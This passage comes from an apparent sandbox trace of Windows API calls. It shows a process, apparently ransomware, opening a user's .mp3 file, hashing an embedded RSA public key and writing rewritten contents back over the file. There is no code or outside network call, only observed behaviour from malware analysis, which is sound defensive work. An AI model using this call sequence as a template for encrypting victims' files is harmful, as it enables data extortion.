hHeap=0x2c0000) returned 1 [0195.599] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.602] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b7ca4f0, ftCreationTime.dwHighDateTime=0x1d8a444, ftLastAccessTime.dwLowDateTime=0x28b83f70, ftLastAccessTime.dwHighDateTime=0x1d8a4e1, ftLastWriteTime.dwLowDateTime=0x28b83f70, ftLastWriteTime.dwHighDateTime=0x1d8a4e1, nFileSizeHigh=0x0, nFileSizeLow=0xdd36, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y3zc_VVY6Kxz1vjr.mp3", cAlternateFileName="Y3ZC_V~1.MP3")) returned 1 [0195.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.602] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\Y3zc_VVY6Kxz1vjr.mp3") returned=".mp3" [0195.602] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\Y3zc_VVY6Kxz1vjr.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\y3zc_vvy6kxz1vjr.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.603] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=56630) returned 1 [0195.603] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.605] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xdd10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.605] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.607] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.607] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xdd36, lpOverlapped=0x0) returned 1 [0195.608] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.608] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.608] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.608] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.610] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.610] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.610] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.610] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.610] GetLastError () returned 0x0 [0195.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0195.610] GetLastError () returned 0x0 [0195.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.611] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.611] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.611] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.611] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.611] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xdd40) returned 0x2af5168 [0195.612] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0195.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f90 [0195.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9eb8 [0195.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0195.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.613] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0195.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64b8 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae64a0 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0195.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.616] GetCurrentThreadId () returned 0x5d8 [0195.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8538 [0195.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0195.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.617] GetCurrentThreadId () returned 0x5d8 [0195.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0195.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0195.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64b8 [0195.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6518 [0195.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0195.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6530 [0195.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64d0 [0195.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0195.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0195.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64a0 [0195.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0195.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0195.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0195.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9eb8 | out: hHeap=0x2c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.628] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xdd31, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xdd31, lpOverlapped=0x0) returned 1 [0195.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.629] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xdd36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.630] WriteFile (in: hFile=0x584, 